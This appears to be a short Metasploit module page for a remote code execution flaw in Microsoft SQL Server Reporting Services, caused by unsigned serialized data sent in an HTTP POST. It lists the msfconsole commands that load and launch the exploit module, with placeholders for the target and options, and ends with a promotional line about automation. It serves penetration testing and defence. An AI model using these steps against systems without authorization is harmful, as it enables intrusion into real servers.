A vulnerability exists within Microsoft's SQL Server Reporting Services which can allow an attacker to craft an HTTP POST request with a serialized object to achieve remote code execution. The vulnerability is due to the fact that the serialized blob is not signed by the server.

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/windows/http/ssrs_navcorrector_viewstate
msf exploit(ssrs_navcorrector_viewstate) > show targets
    ...targets...
msf exploit(ssrs_navcorrector_viewstate) > set TARGET < target-id >
msf exploit(ssrs_navcorrector_viewstate) > show options
    ...show and set options...
msf exploit(ssrs_navcorrector_viewstate) > exploit

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
